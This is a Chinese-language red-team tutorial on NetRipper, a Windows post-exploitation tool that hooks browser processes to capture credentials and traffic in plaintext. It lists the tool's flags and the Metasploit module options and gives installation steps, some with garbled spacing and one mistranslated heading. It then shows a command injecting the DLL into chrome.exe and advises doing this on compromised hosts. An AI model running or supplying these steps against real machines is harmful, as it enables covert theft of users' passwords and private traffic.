红队攻防之获取内存中的密码

红队攻防之获取内存中的密码

ZMdqxS.jpg

0X01 NetRipper

NetRipper是针对Windows系统的后期开发工具,其使用API挂钩来拦截低特权用户的网络流量和与加密相关的功能,从而能够在加密之前/解密之后捕获纯文本流量和加密流量。

0X02 用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Injection: NetRipper.exe DLLpath.dll processname.exe  
Example:   NetRipper.exe DLL.dll firefox.exe  

Generate DLL:

  -h,  --help          Print this help message  
  -w,  --write         Full path for the DLL to write the configuration data  
  -l,  --location      Full path where to save data files (default TEMP)  

Plugins:

  -p,  --plaintext     Capture only plain-text data. E.g. true  
  -d,  --datalimit     Limit capture size per request. E.g. 4096  
  -s,  --stringfinder  Find specific strings. E.g. user,pass,config  

Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass

Metasploit模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf exploit(multi/handler) > use post/windows/gather/netripper/netripper 
msf post(windows/gather/netripper/netripper) > show options

Module options (post/windows/gather/netripper/netripper):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DATALIMIT     65535            no        The number of bytes to save from requests/responses
   DATAPATH      TEMP             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   DLLPATH                        no        Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...
   PLAINTEXT     false            no        True to save only plain-text data
   PROCESSIDS                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                        yes       The session to run this module on.
   STRINGFINDER  DEFAULT          no        Search for specific strings in captured data

设置PROCESSNAMES或PROCESSIDS并运行。

Metasploit安装(Kali)

  1. mkdir / usr / share / metasploit-framework / modules / post / windows / gather / netripper
  2. cp Metasploit / netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
  3. cp x86 / DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
  4. cp x64 / DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

Metasploit安装(后备箱)

  1. mkdir / opt / metasploit-framework / modules / post / windows / gather / netripper
  2. cp Metasploit / netripper.rb /opt/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
  3. cp x86 / DLL.x86.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
  4. cp x64 / DLL.x64.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

0x03 操作演示

执行命令,将DLL文件注入到chrome浏览器里

1
NetRipper.x64.exe "C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll" chrome.exe

登录一个网站就行

img

登录一个网站就行,查看temp

img

通过POWERSHELL也行

img

0x04 思路

可以在入侵主机上注入进程进而获取重要信息,可以结合MSF进行操作

0x05 参考项目主页

https://github.com/NytroRST/NetRipper